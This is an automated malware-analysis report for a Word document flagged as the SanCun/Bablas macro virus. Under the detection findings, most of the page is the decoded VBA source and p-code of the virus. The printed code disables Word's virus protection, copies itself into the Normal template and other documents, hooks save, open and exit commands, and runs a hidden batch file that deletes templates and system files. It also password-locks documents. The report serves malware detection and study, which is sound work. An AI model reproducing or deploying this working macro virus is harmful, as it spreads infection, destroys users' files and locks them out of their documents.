MALICIOUS
316
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close routines, which are indicative of malicious intent. The presence of a Shell() call within the VBA code suggests an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The ClamAV detections further confirm the malicious nature of the file.
Heuristics 7
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell ("c:\c "), vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57664 bytes |
SHA-256: 3e2b8f168755e4f0957131ff11cdc0e873db41f3a12560120261f64b6b714f28 |
|||
|
Detection
ClamAV:
Doc.Trojan.Bablas-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SanCun"
'San I Love You
Const ACENGLAH = "<- This is a ACENGLAH! by SanCun"
Public AD As Object, NT As Object
Sub AutoOpen()
On Error GoTo hapus
Dim NT As Object
Dockenor
Create_Loader
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "SanCun" Then NormInstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "SanCun" Then ActivInstall = True
Next i
If ActivInstall = True And NormInstall = True Then GoTo Label_Exit
If ActivInstall = True And NormInstall = False Then Set Doc = ActiveDocument
If ActivInstall = False And NormInstall = True Then Set Doc = NormalTemplate
Pad = Options.DefaultFilePath(wdDocumentsPath)
ModuleLength = Doc.VBProject.VBComponents("SanCun").CodeModule.CountOfLines
NT.Save
Doc.VBProject.VBComponents("SanCun").Export Pad + ("\Fax.txt")
ActiveDocument.SaveAs fileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
SanCun
Label_Exit:
'CommandBars("Format").Controls("Style...")
If NormInstall = True Then Call Create_Loader
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsAll
Application.EnableCancelKey = wdCancelInterrupt
hapus:
Dockenor
End Sub
Sub Create_Loader()
On Error Resume Next
Options.DefaultFilePath(wdStartupPath) = "C:\Program Files\Microsoft Office\Template"
Options.DefaultFilePath(wdTempFilePath) = "C:\Windows\Cad.Sys"
Pad1 = Options.DefaultFilePath(wdStartupPath)
MyFile = Dir(Pad1 + "\Frieds.dot")
If MyFile = "" Then
Set Adoc = NormalTemplate.OpenAsDocument
With Adoc
.SaveAs fileName:=Pad1 + "\Frieds.dot"
.Close SaveChanges:=wdDoNotSaveChanges
End With
End If
End Sub
Sub SanCun()
On Error Resume Next
Dockenor
Norkedoc
Call sim
Call Create_Loader
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False
If WeekDay(2) Then Call Enjoy
If Month(Now()) = 10 And Day(Now()) = 6 Then Call Enjoy
With Dialogs(wdDialogFileSummaryInfo)
.Author = "CAD Computer"
.Title = "Virus Protection"
.Subject = "For San San"
.Comments = "Virus Protection Password"
.Execute
End With
bodo:
End Sub
Sub FileSave()
On Error Resume Next
Norkedoc
ActiveDocument.Save
SanCun
End Sub
Sub FileClose()
On Error Resume Next
Norkedoc
If ActiveDocument.Saved = False Then ActiveDocument.Save
SanCun
ActiveDocument.Close
End Sub
Sub FileSaveAs()
On Error Resume Next
Norkedoc
SanCun
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileExit()
On Error Resume Next
Norkedoc
SanCun
Call Reg("c:\windows\Reg.bat")
If ActiveDocument.Saved = False Then ActiveDocument.Save
SANSAN
Application.Quit
End Sub
Sub AutoExit()
On Error Resume Next
Norkedoc
'SanCun
SANSAN
End Sub
Sub AutoExec()
On Error GoTo hapus
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Call Reg("c:\windows\Reg.bat")
Call sim
UnlockComments = True
'Pasword
SanCun
WBF
AddIns.Unload False
WBF
hapus:
Dockenor
End Sub
Sub AutoClose()
On Error Resume Next
Norkedoc
SanCun
End Sub
Sub ToolsMacro()
On Error Resume Next
'SanCun
If System.OperatingSystem = "Windows" Then Call Message 'p5687("C:\start.scr")
'If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
'Call Message
End Sub
Sub FileTemplates()
On Error Resume Next
SanCun
If System.OperatingSystem = "Windows" Then Call Cad 'p5687("C:\start.scr")
'If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
'Call Message
End Sub
Sub ViewVBCode()
Dim Password, Pword
On Error Resume Next
SanCun
If System.OperatingSystem = "Windows" Then Call Cad 'p5687("C:\start.scr")
'If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
Do
'Password = "ACENGLAH"
'Pword = InputBox("Type in your password")
'If Pword <> Password Then
'MsgBox "Sorry, incorrect password"
'End
'End If
Call Cad
Loop
End Sub
Sub Reg(strFile As String)
Dim hFile As Long
Close hFile
On Error Resume Next
hFile = FreeFile
Open strFile For Output Access Write As hFile
Shell ("c:\c "), vbHide
Print #hFile, "@echo off"
Print #hFile, "del c:\progra~1\micros~1\office\startup\*.dot"
Print #hFile, "del c:\progra~1\micros~1\templa~1\*.dot"
Print #hFile, "del c:\windows\*.dot"
Print #hFile, "del Zap.bat"
Print #hFile, "del Reg.bat"
Print #hFile, "del c:\Start.exe"
Print #hFile, "del C:\start.scr"
Print #hFile, "del C:\startv.bat"
Print #hFile, "del C:\Autoexec.bat"
Print #hFile, "del C:\Cacah.hit"
Print #hFile, "del C:\cad.sys"
Close hFile
Shell ("c:\windows\Reg.bat"), vbHide
End Sub
Sub FileOpen()
On Error Resume Next
WBT
If Dialogs(80).Show <> 0 Then
Call AutoOpen
Dockenor
Norkedoc
Call SanCun
WBF
Else
WBF
Call SANSAN
End If
End Sub
Sub Message()
nama1 = " San San "
Nama2 = "San San"
msg1 = "Lagi Ngapainn ??? "
msg2 = "Jangan Ngelamun Yeh.."
msg3 = "Kerjain Tuh Tugasnya Yah.... "
msg4 = "Buat Yang Laen Aku Minta Maaf "
msg1 = "I Love You"
msg2 = " "
msg3 = " This Come From My Heart and Soul"
MsgBox (msg1 + Chr(44) + msg2 + Chr(10) + msg3)
If WeekDay(2) Then MsgBox msg1 + nama1, vbInformation
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Nama2 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Nama2, vbInformation, "???"
End Sub
Sub Enjoy()
nama1 = " San !!!"
Nama2 = "San San"
msg1 = "Lagi Ngapainn ??? "
msg2 = " Jangan Ngelamun Yeh.. "
msg3 = " Kerjain Tuh Tugasnya .... "
msg4 = "Buat Yang Laen Aku Minta Maaf "
msg5 = "Kamu Juga "
msg6 = " Kok Ikut-Ikutan Bengong ? "
msg7 = "Dasar Dompok Luh...Ah.."
MsgBox (msg1 + Chr(10) + msg2 + Chr(10) + msg3)
Rem If WeekDay(2) Then MsgBox msg5 + nama1 + Chr(10) + msg6 + Chr(10) + msg3 + Chr(10) + msg7 + nama1 + Chr(10) + msg4, vbInformation
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Nama2 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Nama2, vbInformation, "???"
End Sub
Function Dockenor()
On Error GoTo Erw1
NorOk = False
WBT
Set AD = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Erh1a
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
NMacr = NormalTemplate.VBProject.VBComponents(i).Name
If NMacr = "SanCun" Then NorOk = True
If (NMacr <> "SanCun") And (NMacr <> "ThisDocument") Then
MsgBox ("Normal Template Anda Terkena Virus Macro = " + NMacr + Chr(13) + "Makro akan dihapus dan anda harap enunggu Sejenak"), vbInformation, "SANSAN"
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=NMacr, Object:=wdOrganizerObjectProjectItems
End If
Next i
Erh1a:
If NorOk = False Then
On Error GoTo Erh1
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:= _
"SanCun", Object:=wdOrganizerObjectProjectItems
Templates(NormalTemplate.FullName).Save
NormalTemplate.Application.Visible = False
Erh1:
End If
Erw1:
End Function
Function Norkedoc()
On Error GoTo Erw2
DokSave = 0
Dokok = False
Set AD = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Erh2a
For i = 1 To AD.VBProject.VBComponents.Count
NMacr = AD.VBProject.VBComponents(i).Name
If NMacr = "SanCun" Then Dokok = True
'NMacr = NT.VBProject.VBComponents(i).Name
'If NMacr = "SanCun" Then Dokok = True
If (NMacr <> "SanCun") And _
(NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
MsgBox ("Documen Anda Terkena Virus Macro = " + NMacr + Chr(13) + "Virus Makro akan dihapus dan anda harap tunggu Sejenak"), vbInformation, "SANSAN"
Application.OrganizerDelete Source:=AD.FullName, _
Name:=NMacr, Object:=wdOrganizerObjectProjectItems
End If
Next i
Erh2a:
If Dokok = False Then
On Error GoTo Erh2
Application.OrganizerCopy Source:=NT.FullName, _
Destination:=AD.FullName, Name:= _
"SanCun", Object:=wdOrganizerObjectProjectItems
ActiveDocument.ReadOnlyRecommended = False
ActiveDocument.Save
Erh2:
End If
Erw2:
End Function
Function WBT()
WordBasic.DisableAutoMacros True
End Function
Function WBF()
WordBasic.DisableAutoMacros False
End Function
Function sim()
f56879025 = GetAttr(NormalTemplate.FullName)
Application.VBE.ActiveVBProject.VBComponents("SanCun").Export "c:\windows\Cad.sys"
If f56879025 = vbReadOnly Then GoTo bodo
If f56879025 = vbReadOnly + vbArchive Then GoTo bodo
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "SanCun" Then xxx902578112 = True
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "SanCun" Then mmf78116 = True
Next i
If xxx902578112 = True And mmf78116 = False Then Set o7811902511 = NormalTemplate.VBProject.VBComponents
If xxx902578112 = False And mmf78116 = True Then Set o7811902511 = ActiveDocument.VBProject.VBComponents
o7811902511.Import "c:\windows\Cad.sys"
If activeinst = False Then ActiveDocument.SaveAs fileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If mmf78116 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
bodo:
End Function
Sub Pasword()
'If ActiveDocument = AD Then
With ActiveDocument
.ReadOnlyRecommended = False
.EmbedTrueTypeFonts = False
.SaveFormsData = False
.SaveSubsetFonts = False
.Password = "SANSAN"
.WritePassword = "SANSAN"
End With
Application.DefaultSaveFormat = "SANSAN"
ActiveDocument.SaveAs fileName:=ActiveDocument.FullName, FileFormat:=wdAutoFormat, _
LockComments:=False, Password:="SANSAN", AddToRecentFiles:=True, _
WritePassword:="SANSAN", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
False
'Else
'With ActiveDocument
'.ReadOnlyRecommended = False
'.EmbedTrueTypeFonts = False
'.SaveFormsData = False
'.SaveSubsetFonts = False
'.Password = "SANSAN"
'.WritePassword = "SANSAN"
'End With
'Application.DefaultSaveFormat = "SANSAN"
'ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatTemplate, _
'LockComments:=False, Password:="SANSAN", AddToRecentFiles:=True, _
'WritePassword:="SANSAN", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
' SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
'False
'End If
End Sub
Sub ShowMessage()
H = Time
If (WeekDay(Date) = vbFriday Or WeekDay(Date) = vbSunday) And Time < TimeValue("21:00:00") Then
For i = 1 To 100
Beep
Next i
H = MsgBox("Terimakasih buat dosenku yang amat sangat " & Chr(34) & _
"bijaksana" & Chr(34) & "," & Chr(13) & "yang telah memberiku nilai JELEK. Saya merasa bangga " & Chr(13) & _
"dan sungguh-sungguh bangga terhadap dosenku itu." & Chr(13) & _
"Sekali lagi saya ucapkan terimakasih!." & Chr(13) & Chr(13) & "Semoga mereka tetap di STIKI." & _
Chr(13) & "(buat teman-teman, ma'af mengganggu.)", vbOKOnly + vbExclamation, "Ucapan Terimakasih")
End If
End Sub
Sub Bablas()
Options.SaveNormalPrompt = True
Options.VirusProtection = True
Options.SavePropertiesPrompt = True
End Sub
Sub HelpAbout()
H = MsgBox("Qun katawon walataqun kalaler." & Chr(13) & Chr(13) & _
"I LOVE SOMETHING ERROR !", vbOKOnly + vbExclamation, "Bpp Hacker")
End Sub
Sub ToolsOptions()
Options.SaveNormalPrompt = False
Options.SavePropertiesPrompt = False
Options.VirusProtection = False
Dialogs(wdDialogToolsOptions).Show
Bablas
End Sub
Sub ChangeCap()
On Error Resume Next
Application.Caption = "Bpp Hacker is now activating "
ActiveWindow.Caption = "(I Don't mean to disturb.)"
End Sub
Sub RestoreCap()
On Error Resume Next
Application.Caption = "Microsoft Word"
ActiveWindow.Caption = ActiveDocument.Name
End Sub
Sub OpenMyMacro()
If InputBox("Enter password", "Bpp Hacker") = "azizoke" Then Application.ShowVisualBasicEditor = True
End Sub
Sub SikatDocument()
Dim DocOk As Boolean
DocOk = False
For Each Obj In ActiveDocument.VBProject.VBComponents
If Obj.Name = "BPPHCK" Then DocOk = True
If Obj.Name <> "BPPHCK" And Obj.Name <> "ThisDocument" Then
Application.StatusBar = "Deleting " + Obj.Name + _
" Macro in " + ActiveDocument.Name + "..."
Application.OrganizerDelete Source:=ActiveDocument.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
If DocOk = False Then
Application.StatusBar = "Copying Bpp Hacker From Normal Template to " _
+ ActiveDocument.Name + "..."
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument, Name:="BPPHCK", Object:=wdOrganizerObjectProjectItems
End If
End Sub
Sub SikatTemplate()
Dim NorOk As Boolean
NorOk = False
For Each Obj In NormalTemplate.VBProject.VBComponents
If Obj.Name = "BPPHCK" Then NorOk = True
If Obj.Name <> "BPPHCK" And Obj.Name <> "ThisDocument" Then
Application.StatusBar = "Deleting " + Obj.Name + _
" Macro in Normal Template..."
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
If NorOk = False Then
Application.StatusBar = "Copying Bpp Hacker From " + ActiveDocument.Name + _
" to Normal Template..."
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="BPPHCK", Object:=wdOrganizerObjectProjectItems
Application.DisplayRecentFiles = False
Application.DisplayRecentFiles = True
End If
ChangeCap
WordBasic.DisableAutoMacros False
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
SikatDocument
ActiveDocument.Save
End If
RestoreCap
WordBasic.DisableAutoMacros True
Bablas
ChangeCap
SikatTemplate
On Error Resume Next
NormalTemplate.Save
RestoreCap
SikatDocument
AutoClose
If ActiveDocument.Saved = False Then
SikatDocument
SikatTemplate
On Error Resume Next
ActiveDocument.Save
ActiveDocument.Saved = True
End If
End Sub
Sub Ancurin()
C = Documents.Count
If C <> 0 Then
Dockenor.SikatDocument
WordBasic.DisableAutoMacros True
On Error Resume Next
If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
Else: Application.OnTime Now + TimeValue("00:00:07"), "Normal.BPPHCK.Ancurin"
End If
End Sub
Sub SANSAN()
nama1 = " San San "
Nama2 = "San San"
msg1 = "Lagi Ngapainn ??? "
msg2 = "Jangan Ngelamun Yeh.."
msg3 = "Kerjain Tuh Tugasnya Yah.... "
msg4 = "Buat Yang Laen Aku Minta Maaf "
msg1 = "I Love You"
msg2 = " "
msg3 = " This Come From My Heart and Soul"
msg4 = " (Cintaku Negeriku)"
MsgBox msg1 + Chr(44) + msg2 + Chr(13) + msg3 + Chr(13) + msg2 + Chr(10) + msg4, vbInformation, "Cun..."
If WeekDay(2) Then MsgBox msg1 + nama1, vbInformation, "Cun..."
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Nama2 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Nama2, vbInformation, "SANSAN"
End Sub
Sub Cad()
nama1 = " San San "
msg1 = "Mau Ngapainn Elu Tuh ??? "
msg2 = "Mau Coba-coba Nganggu Yach..."
msg3 = "Kerjain Tuh Tugasnya Yah.... "
msg4 = "Masih Mau Coba-coba Nih ?"
msg5 = "Penasaran Yach Omm....?"
msg6 = "Boleh dah dicoba !!!"
MsgBox (msg1 + Chr(44) + msg2 + Chr(10) + msg3), vbInformation, "SANSAN"
If WeekDay(2) Then MsgBox msg4 + Chr(10) + msg5 + Chr(10) + msg6, vbInformation, "SANSAN"
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Chr(10) + msg5 + Chr(10) + msg6, vbInformation, "SANSAN"
Do
SANSAN
Loop
End Sub
' Processing file: /tmp/qstore_zupm2jmu
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/SanCun - 27702 bytes
' Line #0:
' QuoteRem 0x0000 0x000E "San I Love You"
' Line #1:
' Dim (Const)
' LitStr 0x0020 "<- This is a ACENGLAH! by SanCun"
' VarDefn ACENGLAH
' Line #2:
' Dim (Public)
' VarDefn AD (As Object)
' VarDefn NT (As Object)
' Line #3:
' FuncDefn (Sub AutoOpen())
' Line #4:
' OnError hapus
' Line #5:
' Dim
' VarDefn NT (As Object)
' Line #6:
' ArgsCall Dockenor 0x0000
' Line #7:
' ArgsCall Create_Loader 0x0000
' Line #8:
' ArgsCall Norkedoc 0x0000
' Line #9:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #10:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #11:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #12:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #13:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #14:
' Ld i
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0006 "SanCun"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St NormInstall
' EndIf
' Line #15:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #16:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #17:
' Ld i
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd New
' LitStr 0x0006 "SanCun"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St ActivInstall
' EndIf
' Line #18:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #19:
' Ld ActivInstall
' LitVarSpecial (True)
' Eq
' Ld NormInstall
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' GoTo Label_Exit
' EndIf
' Line #20:
' Ld ActivInstall
' LitVarSpecial (True)
' Eq
' Ld NormInstall
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld ActiveDocument
' Set Doc
' EndIf
' Line #21:
' Ld ActivInstall
' LitVarSpecial (False)
' Eq
' Ld NormInstall
' LitVarSpecial (True)
' Eq
' And
' If
' BoSImplicit
' SetStmt
' Ld NormalTemplate
' Set Doc
' EndIf
' Line #22:
' Ld wdDocumentsPath
' Ld Options
' ArgsMemLd DefaultFilePath 0x0001
' St Pad
' Line #23:
' LitStr 0x0006 "SanCun"
' Ld Doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' St ModuleLength
' Line #24:
' Ld NT
' ArgsMemCall Save 0x0000
' Line #25:
' Ld Pad
' LitStr 0x0008 "\Fax.txt"
' Paren
' Add
' LitStr 0x0006 "SanCun"
' Ld Doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #26:
' Ld ActiveDocument
' MemLd FullName
' ParamNamed fileName
' Ld wdFormatDocument
' ParamNamed FileFormat
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' Line #27:
' ArgsCall SanCun 0x0000
' Line #28:
' Label Label_Exit
' Line #29:
' QuoteRem 0x0000 0x002A "CommandBars("Format").Controls("Style...")"
' Line #30:
' Ld NormInstall
' LitVarSpecial (True)
' Eq
' If
' BoSImplicit
' ArgsCall (Call) Create_Loader 0x0000
' EndIf
' Line #31:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #32:
' Ld wdAlertsAll
' Ld Application
' MemSt DisplayAlerts
' Line #33:
' Ld wdCancelInterrupt
' Ld Application
' MemSt EnableCancelKey
' Line #34:
' Label hapus
' Line #35:
' ArgsCall Dockenor 0x0000
' Line #36:
' EndSub
' Line #37:
' FuncDefn (Sub Create_Loader())
' Line #38:
' OnError (Resume Next)
' Line #39:
' LitStr 0x002A "C:\Program Files\Microsoft Office\Template"
' Ld wdStartupPath
' Ld Options
' ArgsMemSt DefaultFilePath 0x0001
' Line #40:
' LitStr 0x0012 "C:\Windows\Cad.Sys"
' Ld wdTempFilePath
' Ld Options
' ArgsMemSt DefaultFilePath 0x0001
' Line #41:
' Ld wdStartupPath
' Ld Options
' ArgsMemLd DefaultFilePath 0x0001
' St Pad1
' Line #42:
' Ld Pad1
' LitStr 0x000B "\Frieds.dot"
' Add
' ArgsLd Dir 0x0001
' St MyFile
' Line #43:
' Ld MyFile
' LitStr 0x0000 ""
' Eq
' IfBlock
' Line #44:
' SetStmt
' Ld NormalTemplate
' MemLd OpenAsDocument
' Set Adoc
' Line #45:
' StartWithExpr
' Ld Adoc
' With
' Line #46:
' Ld Pad1
' LitStr 0x000B "\Frieds.dot"
' Add
' ParamNamed fileName
' ArgsMemCallWith SaveAs 0x0001
' Line #47:
' Ld wdDoNotSaveChanges
' ParamNamed SaveChanges
' ArgsMemCallWith Close 0x0001
' Line #48:
' EndWith
' Line #49:
' EndIfBlock
' Line #50:
' EndSub
' Line #51:
' FuncDefn (Sub SanCun())
' Line #52:
' OnError (Resume Next)
' Line #53:
' ArgsCall Dockenor 0x0000
' Line #54:
' ArgsCall Norkedoc 0x0000
' Line #55:
' ArgsCall (Call) sim 0x0000
' Line #56:
' ArgsCall (Call) Create_Loader 0x0000
' Line #57:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #58:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #59:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #60:
' LitVarSpecial (False)
' Ld ActiveDocument
' MemSt ReadOnlyRecommended
' Line #61:
' LitDI2 0x0002
' ArgsLd WeekDay 0x0001
' If
' BoSImplicit
' ArgsCall (Call) Enjoy 0x0000
' EndIf
' Line #62:
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x000A
' Eq
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x0006
' Eq
' And
' If
' BoSImplicit
' ArgsCall (Call) Enjoy 0x0000
' EndIf
' Line #63:
' StartWithExpr
' Ld wdDialogFileSummaryInfo
' ArgsLd Dialogs 0x0001
' With
' Line #64:
' LitStr 0x000C "CAD Computer"
' MemStWith Author
' Line #65:
' LitStr 0x0010 "Virus Protection"
' MemStWith Title
' Line #66:
' LitStr 0x000B "For San San"
' MemStWith Subject
' Line #67:
' LitStr 0x0019 "Virus Protection Password"
' MemStWith Comments
' Line #68:
' ArgsMemCallWith Execute 0x0000
' Line #69:
' EndWith
' Line #70:
' Label bodo
' Line #71:
' EndSub
' Line #72:
' FuncDefn (Sub FileSave())
' Line #73:
' OnError (Resume Next)
' Line #74:
' ArgsCall Norkedoc 0x0000
' Line #75:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #76:
' ArgsCall SanCun 0x0000
' Line #77:
' EndSub
' Line #78:
' FuncDefn (Sub FileClose())
' Line #79:
' OnError (Resume Next)
' Line #80:
' ArgsCall Norkedoc 0x0000
' Line #81:
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #82:
' ArgsCall SanCun 0x0000
' Line #83:
' Ld ActiveDocument
' ArgsMemCall Close 0x0000
' Line #84:
' EndSub
' Line #85:
' FuncDefn (Sub FileSaveAs())
' Line #86:
' OnError (Resume Next)
' Line #87:
' ArgsCall Norkedoc 0x0000
' Line #88:
' ArgsCall SanCun 0x0000
' Line #89:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #90:
' EndSub
' Line #91:
' FuncDefn (Sub FileExit())
' Line #92:
' OnError (Resume Next)
' Line #93:
' ArgsCall Norkedoc 0x0000
' Line #94:
' ArgsCall SanCun 0x0000
' Line #95:
' LitStr 0x0012 "c:\windows\Reg.bat"
' ArgsCall (Call) Reg 0x0001
' Line #96:
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #97:
' ArgsCall SANSAN 0x0000
' Line #98:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #99:
' EndSub
' Line #100:
' FuncDefn (Sub AutoExit())
' Line #101:
' OnError (Resume Next)
' Line #102:
' ArgsCall Norkedoc 0x0000
' Line #103:
' QuoteRem 0x0004 0x0006 "SanCun"
' Line #104:
' ArgsCall SANSAN 0x0000
' Line #105:
' EndSub
' Line #106:
' FuncDefn (Sub AutoExec())
' Line #107:
' OnError hapus
' Line #108:
' ArgsCall Norkedoc 0x0000
' Line #109:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #110:
' LitStr 0x0012 "c:\windows\Reg.bat"
' ArgsCall (Call) Reg 0x0001
' Line #111:
' ArgsCall (Call) sim 0x0000
' Line #112:
' LitVarSpecial (True)
' St UnlockComments
' Line #113:
' QuoteRem 0x0000 0x0007 "Pasword"
' Line #114:
' ArgsCall SanCun 0x0000
' Line #115:
' ArgsCall WBF 0x0000
' Line #116:
' LitVarSpecial (False)
' Ld AddIns
' ArgsMemCall Unlock 0x0001
' Line #117:
' ArgsCall WBF 0x0000
' Line #118:
' Label hapus
' Line #119:
' ArgsCall Dockenor 0x0000
' Line #120:
' EndSub
' Line #121:
' FuncDefn (Sub AutoClose())
' Line #122:
' OnError (Resume Next)
' Line #123:
' ArgsCall Norkedoc 0x0000
' Line #124:
' ArgsCall SanCun 0x0000
' Line #125:
' EndSub
' Line #126:
' FuncDefn (Sub ToolsMacro())
' Line #127:
' OnError (Resume Next)
' Line #128:
' QuoteRem 0x0004 0x0006 "SanCun"
' Line #129:
' Ld System
' MemLd OperatingSystem
' LitStr 0x0007 "Windows"
' Eq
' If
' BoSImplicit
' ArgsCall (Call) Message 0x0000
' EndIf
' QuoteRem 0x003C 0x0015 "p5687("C:\start.scr")"
' Line #130:
' QuoteRem 0x0004 0x0047 "If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")"
' Line #131:
' QuoteRem 0x0000 0x000C "Call Message"
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.